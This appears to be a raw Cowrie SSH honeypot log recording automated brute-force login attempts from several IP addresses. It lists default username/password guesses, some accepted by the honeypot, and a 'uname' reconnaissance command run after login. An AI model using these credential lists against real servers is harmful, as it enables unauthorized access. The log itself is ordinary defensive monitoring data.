{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:16:20.491940Z","src_ip":"212.227.235.229","session":"34a6d8766662"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345678","message":"login attempt [ubuntu/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T12:16:22.047016Z","src_ip":"212.227.235.229","session":"34a6d8766662"}
{"eventid":"cowrie.session.closed","duration":31.534881353378296,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:23.468485Z","src_ip":"212.227.125.160","session":"4173f877de05"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:23.541757Z","src_ip":"212.227.235.229","session":"34a6d8766662"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37586,"dst_ip":"1.2.3.4","dst_port":22,"session":"15b5848c32e6","protocol":"ssh","message":"New connection: 83.168.105.65:37586 (1.2.3.4:22) [session: 15b5848c32e6]","sensor":"my-vps","timestamp":"2025-08-26T12:16:25.275924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:16:25.276830Z","src_ip":"83.168.105.65","session":"15b5848c32e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:16:25.313035Z","src_ip":"83.168.105.65","session":"15b5848c32e6"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:16:25.423675Z","src_ip":"83.168.105.65","session":"15b5848c32e6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:26.462388Z","src_ip":"83.168.105.65","session":"15b5848c32e6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41670,"dst_ip":"1.2.3.4","dst_port":22,"session":"df9079583205","protocol":"ssh","message":"New connection: 83.168.105.65:41670 (1.2.3.4:22) [session: df9079583205]","sensor":"my-vps","timestamp":"2025-08-26T12:16:40.646800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:16:40.647489Z","src_ip":"83.168.105.65","session":"df9079583205"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:16:40.686890Z","src_ip":"83.168.105.65","session":"df9079583205"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:16:40.806769Z","src_ip":"83.168.105.65","session":"df9079583205"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:41.848779Z","src_ip":"83.168.105.65","session":"df9079583205"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58748,"dst_ip":"1.2.3.4","dst_port":22,"session":"0053e07bb7a6","protocol":"ssh","message":"New connection: 212.227.235.229:58748 (1.2.3.4:22) [session: 0053e07bb7a6]","sensor":"my-vps","timestamp":"2025-08-26T12:16:55.216475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:16:55.501410Z","src_ip":"212.227.235.229","session":"0053e07bb7a6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:16:55.502106Z","src_ip":"212.227.235.229","session":"0053e07bb7a6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41704,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1cd31d80360","protocol":"ssh","message":"New connection: 83.168.105.65:41704 (1.2.3.4:22) [session: b1cd31d80360]","sensor":"my-vps","timestamp":"2025-08-26T12:16:56.193216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:16:56.194156Z","src_ip":"83.168.105.65","session":"b1cd31d80360"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:16:56.230469Z","src_ip":"83.168.105.65","session":"b1cd31d80360"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:16:56.341628Z","src_ip":"83.168.105.65","session":"b1cd31d80360"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:16:56.432236Z","src_ip":"83.168.105.65","session":"b1cd31d80360"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:16:56.432971Z","src_ip":"83.168.105.65","session":"b1cd31d80360"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:56.470172Z","src_ip":"83.168.105.65","session":"b1cd31d80360"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:56.471514Z","src_ip":"83.168.105.65","session":"b1cd31d80360"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345","message":"login attempt [ubuntu/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T12:16:57.310057Z","src_ip":"212.227.235.229","session":"0053e07bb7a6"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:58.743558Z","src_ip":"212.227.235.229","session":"0053e07bb7a6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":35872,"dst_ip":"1.2.3.4","dst_port":22,"session":"488fc87c489f","protocol":"ssh","message":"New connection: 196.251.86.249:35872 (1.2.3.4:22) [session: 488fc87c489f]","sensor":"my-vps","timestamp":"2025-08-26T12:17:05.688057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:17:06.196462Z","src_ip":"196.251.86.249","session":"488fc87c489f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:17:06.197213Z","src_ip":"196.251.86.249","session":"488fc87c489f"}
{"eventid":"cowrie.login.failed","username":"test","password":"test321","message":"login attempt [test/test321] failed","sensor":"my-vps","timestamp":"2025-08-26T12:17:07.982391Z","src_ip":"196.251.86.249","session":"488fc87c489f"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:17:09.458030Z","src_ip":"196.251.86.249","session":"488fc87c489f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56922,"dst_ip":"1.2.3.4","dst_port":22,"session":"5728ca90a764","protocol":"ssh","message":"New connection: 83.168.105.65:56922 (1.2.3.4:22) [session: 5728ca90a764]","sensor":"my-vps","timestamp":"2025-08-26T12:17:11.726495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:17:11.727349Z","src_ip":"83.168.105.65","session":"5728ca90a764"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:17:11.764664Z","src_ip":"83.168.105.65","session":"5728ca90a764"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:17:11.881260Z","src_ip":"83.168.105.65","session":"5728ca90a764"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:17:12.062116Z","src_ip":"83.168.105.65","session":"5728ca90a764"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:17:12.062820Z","src_ip":"83.168.105.65","session":"5728ca90a764"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:17:12.101335Z","src_ip":"83.168.105.65","session":"5728ca90a764"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:17:12.102363Z","src_ip":"83.168.105.65","session":"5728ca90a764"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":55360,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce45ac2f2fde","protocol":"ssh","message":"New connection: 83.168.105.65:55360 (1.2.3.4:22) [session: ce45ac2f2fde]","sensor":"my-vps","timestamp":"2025-08-26T12:17:27.201770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:17:27.203886Z","src_ip":"83.168.105.65","session":"ce45ac2f2fde"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:17:27.240489Z","src_ip":"83.168.105.65","session":"ce45ac2f2fde"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T12:17:27.359006Z","src_ip":"83.168.105.65","session":"ce45ac2f2fde"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:17:28.397720Z","src_ip":"83.168.105.65","session":"ce45ac2f2fde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47460,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f717ea5d9b1","protocol":"ssh","message":"New connection: 212.227.235.229:47460 (1.2.3.4:22) [session: 9f717ea5d9b1]","sensor":"my-vps","timestamp":"2025-08-26T12:17:30.799744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:17:31.081232Z","src_ip":"212.227.235.229","session":"9f717ea5d9b1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:17:31.083372Z","src_ip":"212.227.235.229","session":"9f717ea5d9b1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"qwerty","message":"login attempt [ubuntu/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T12:17:32.891068Z","src_ip":"212.227.235.229","session":"9f717ea5d9b1"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:17:34.049168Z","src_ip":"212.227.235.229","session":"9f717ea5d9b1"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54318,"dst_ip":"1.2.3.4","dst_port":22,"session":"a41d6a49a0d0","protocol":"ssh","message":"New connection: 83.168.105.65:54318 (1.2.3.4:22) [session: a41d6a49a0d0]","sensor":"my-vps","timestamp":"2025-08-26T12:17:42.630513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:17:42.631286Z","src_ip":"83.168.105.65","session":"a41d6a49a0d0"}
